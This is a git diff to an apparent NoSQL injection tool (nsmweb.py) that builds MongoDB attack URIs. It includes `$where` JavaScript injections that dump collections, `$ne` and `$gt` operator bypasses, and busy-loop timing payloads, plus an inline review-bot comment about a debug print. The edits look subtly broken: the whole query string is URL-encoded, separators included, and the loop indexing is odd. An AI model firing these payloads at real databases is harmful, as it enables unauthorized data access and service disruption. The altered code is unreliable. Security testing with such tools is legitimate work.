diff --git a/nsmweb.py b/nsmweb.py
index 167de1e..4dd77c8 100644
--- a/nsmweb.py
+++ b/nsmweb.py
@@ -133,6 +133,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 else:
 print "Test 2: $where injection (string escape)"
+ print uriArray[2]
 req = urllib2.Request(uriArray[2], None, requestHeaders)
 errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
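Review bot: `print uriArray[2]` reads like a leftover debug statement: it dumps the full test-2 request URI to stdout on every run, while none of the sibling tests in getApps print theirs. Either drop the line or guard it behind the script's verbose/debug setting, if one exists, so the console output stays consistent across tests. getApps starts and ends outside this hunk.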
@@ -890,49 +891,31 @@ def buildUri(origUri, randValue):
 return
 x = 0
- uriArray[0] = split_uri[0] + "?"
- uriArray[1] = split_uri[0] + "?"
- uriArray[2] = split_uri[0] + "?"
- uriArray[3] = split_uri[0] + "?"
- uriArray[4] = split_uri[0] + "?"
- uriArray[5] = split_uri[0] + "?"
- uriArray[6] = split_uri[0] + "?"
- uriArray[7] = split_uri[0] + "?"
- uriArray[8] = split_uri[0] + "?"
- uriArray[9] = split_uri[0] + "?"
- uriArray[10] = split_uri[0] + "?"
- uriArray[11] = split_uri[0] + "?"
- uriArray[12] = split_uri[0] + "?"
- uriArray[13] = split_uri[0] + "?"
- uriArray[14] = split_uri[0] + "?"
- uriArray[15] = split_uri[0] + "?"
- uriArray[16] = split_uri[0] + "?"
- uriArray[17] = split_uri[0] + "?"
- uriArray[18] = split_uri[0] + "?"
+ for item in paramName:
 if paramName[x] in injOpt:
 uriArray[0] += paramName[x] + "=" + randValue + "&"
 uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
- uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
- uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
- uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
- uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
- uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
- uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
+ uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
+ uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
+ uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
+ uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
+ uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
+ uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
 uriArray[8] += paramName[x] + "[$gt]=&"
- uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
- uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
- uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
- uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
- uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
- uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
+ uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
+ uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
+ uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
+ uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
+ uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
+ uriArray[14] += paramName[x] + "a'; return true; var dum='a"
 uriArray[15] += paramName[x] + "1; return true; var dum=2"
 #Add values that can be manipulated for database attacks
- uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
+ uriArray[16] += paramName[x] + "=a\'; ---"
 uriArray[17] += paramName[x] + "=1; if ---"
- uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
+ uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
 else:
 uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -959,7 +942,9 @@ def buildUri(origUri, randValue):
 #Clip the extra & off the end of the URL
 x = 0
 while x <= 18:
- uriArray[x]= uriArray[x][:-1]
+# uriArray[x]= uriArray[x][:-1]
+ uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])
+
 x += 1
 return uriArray[0]
@@ -1193,4 +1178,3 @@ def getDBInfo():
 crackHash = raw_input("Crack another hash (y/n)?")
 raw_input("Press enter to continue...")
 return
-